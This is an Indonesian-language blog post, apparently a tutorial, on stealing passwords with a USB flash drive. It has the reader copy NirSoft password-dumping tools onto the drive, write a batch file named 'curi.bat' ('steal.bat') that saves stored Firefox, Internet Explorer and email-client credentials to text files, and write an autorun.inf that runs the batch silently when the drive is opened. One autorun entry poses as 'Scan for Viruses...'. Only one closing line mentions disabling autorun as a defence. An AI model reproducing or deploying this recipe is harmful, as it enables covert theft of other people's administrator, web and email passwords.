Hacking bisa dilakukan dimana saja dan kapan saja ketika ada peluang serta kelemahan yang tidak ditutup. Bagi anda pengguna Operating system Windows hati-hati dan anda harus mengerti tentang system yang anda gunakan itu. Kenapa? OS milik Bill gate ini relatif banyak bercelah yang memudahkan untuk memasukkan script exploit yang biasanya disebut virus.
Kali ini kita memanfaatkan fasilitas Autorun yang sedang aktif (tidak dimatikan) dan menggunakan media flashdisk sebagai media perantara untuk menyebar virus.
Virus apa itu?
Tenang saja.. virus yang kita masukkan ini bukan merusak komputer tetapi hanya mencuri password-password di dalamnya..
Mulai dari password Administrator, password login web, dan password login email.
OK persiapan yang harus dilakukan adalah download toolsnya
Tools yang kita butuhkan adalah sebagai berikut silahkan dicari sendiri di google:
IE PassView
IE PassView
PasswordFox
Mail PassView
PasswordFox:
ini memungkinkan anda membaca nama user dan password yang disimpan oleh Mozilla Firefox.
Secara default PasswordFox akan menampilkan username dan password yang tersimpan di folder Profiles (C:\Documents and Settings\[user name]\Application Data\Mozilla\Firefox\Profiles\tabk8vv1.default)
Mail PassView
Seperti namanya Mail PassView ini bermanfaat untuk menampilkan password dan informasi akun lain.
Email clients yang dapat ditampilkan oleh aplikasi berukuran mini ini diantaranya:
• Outlook Express
• Microsoft Outlook 2000 (akun POP3 dan SMTP)
• Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP dan SMTP)
• Windows Mail
• Windows Live Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x (bila password tidak dienkrip)
• Mozilla Thunderbird (bila password tidak dienkrip)
• Group Mail Free
• Yahoo! Mail (jika password disimpan di aplikasi Yahoo! Messenger)
• Hotmail/MSN mail (jika password disimpan di aplikasi MSN/Windows/Live Messenger)
• Gmail (jika password disimpan oleh Gmail Notifier, Google Desktop, atau Google Talk.
Langkah Kedua:
Setelah download tools diatas
Copy semua file-file tools tersebut (iepv.exe, mailpv.exe, passwordfox.exe) ke flashdisk anda masing masing.
Langkah Ketiga:
Agar semua file-file pencuri tadi bisa dijalankan semua secara bersamaan maka butuh sebuah satu file execute yang memicunya. Maka kita buat sebuah file .bat melalui notepad. lalu ketik sebagai berikut :
start PasswordFox.exe /stext Mozilla Firefox.txt
start iepv.exe /stext Internet Explorer.txt
start mailpv.exe /stext Mail.txt
Lalu simpan dengan nama "curi.bat" di falshdisk anda
Langkah Keempat:
Agar script "curi.bat" diatas bisa dijalankan otomatis saat menancapkan flashdisk maka kita harus membuat file "autorun.inf" dengan notepad dan ketik sebagai berikut:
[autorun]
open=curi.bat
shellexecute= curi.bat
action=Open folder to view files
shell\Explore\command= curi.bat
shell\Open\command= curi.bat
shell\Scan for Viruses...\command= curi.bat
Selesai, tinggal tunggu action saja.
Saat flashdisk dibuka maka semua history username dan password akan terulis di:
Firefox.txt
Explorer.txt
Mail.txt
Pencegahan pencurian ini:
Matikan fungsi autorun di regedit dan gpedit.msc
Tidak ada komentar:
Posting Komentar